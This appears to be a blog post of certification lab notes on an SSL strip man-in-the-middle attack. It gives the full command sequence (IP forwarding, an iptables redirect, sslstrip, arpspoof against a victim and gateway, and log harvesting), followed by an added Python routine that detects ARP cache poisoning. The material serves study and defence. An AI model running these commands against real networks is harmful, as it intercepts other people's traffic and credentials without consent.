Saturday, July 18, 2020

[eCPPT][SSL][MITM] SSL Strip Attack

Comment: The following experiment works well with Kali 2018.1. The reason I don't use the newest version, namely 2020.X, is that it does not include sslstrip by default, and python-twisted-web, which sslstrip requires, is tough to install on it.

Running (in this case, 192.168.0.19 is the victim, 192.168.0.1 is the gateway, and TCP 8080 is the listening port):
# sysctl net.ipv4.ip_forward=1
# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
# sslstrip -a -f -l 8080 -w /root/sslstrip.log
Open a new terminal and type:
# arpspoof -i eth0 -t 192.168.0.19 -r 192.168.0.1

Harvest:
Open a new terminal and type:
# tail -n 30 -f /root/sslstrip.log

P.S.: This experiment only succeeds when the victim's browser does not support HSTS.
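
Detection side, as an added example that is not part of the original post: the arpspoof step leaves the victim's neighbour cache with the gateway IP resolving to another host's MAC, which can be checked from `ip neigh show` output. The sample output, MAC addresses, extra hosts and the function names below are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed `ip neigh show` output as seen on the victim (192.168.0.19).
# All MAC addresses and the 192.168.0.42 / .7 hosts are made up for this example.
SAMPLE_POISONED = """\
192.168.0.1 dev eth0 lladdr 08:00:27:AA:BB:CC REACHABLE
192.168.0.42 dev eth0 lladdr 08:00:27:aa:bb:cc STALE
192.168.0.7 dev eth0 lladdr 52:54:00:12:34:56 REACHABLE
192.168.0.99 dev eth0  FAILED
"""
SAMPLE_CLEAN = """\
192.168.0.1 dev eth0 lladdr 08:00:27:11:22:33 REACHABLE
192.168.0.7 dev eth0 lladdr 52:54:00:12:34:56 REACHABLE
"""

NEIGH_RE = re.compile(
    r"^(?P<ip>\S+)\s+dev\s+\S+\s+lladdr\s+(?P<mac>(?:[0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2})\b"
)

def parse_neigh(text):
    """Return {ip: mac} for entries with a resolved link-layer address."""
    table = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:  # FAILED/INCOMPLETE entries have no lladdr and are skipped
            table[m.group("ip")] = m.group("mac").lower()
    return table

def find_arp_anomalies(text, gateway_ip, known_gateway_mac=None):
    """Return a list of (severity, kind, detail) tuples."""
    table = parse_neigh(text)
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    findings = []
    # One MAC answering for several IPs is what a poisoned cache looks like
    # (it can also be proxy ARP or a multi-homed router, so triage the hit).
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            sev = "high" if gateway_ip in ips else "medium"
            findings.append((sev, "shared_mac", f"{mac} -> {sorted(ips)}"))
    # The spoofing host's own IP may be absent from the cache, so also
    # compare the gateway entry against a baseline recorded out of band.
    gw_mac = table.get(gateway_ip)
    if known_gateway_mac and gw_mac and gw_mac != known_gateway_mac.lower():
        findings.append(("high", "gateway_mac_changed",
                         f"{gateway_ip} is {gw_mac}, baseline {known_gateway_mac.lower()}"))
    return findings
```

Feed it the live cache with `subprocess.run(["ip", "neigh", "show"], capture_output=True, text=True).stdout`; the baseline gateway MAC should be recorded while the network is known to be clean.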
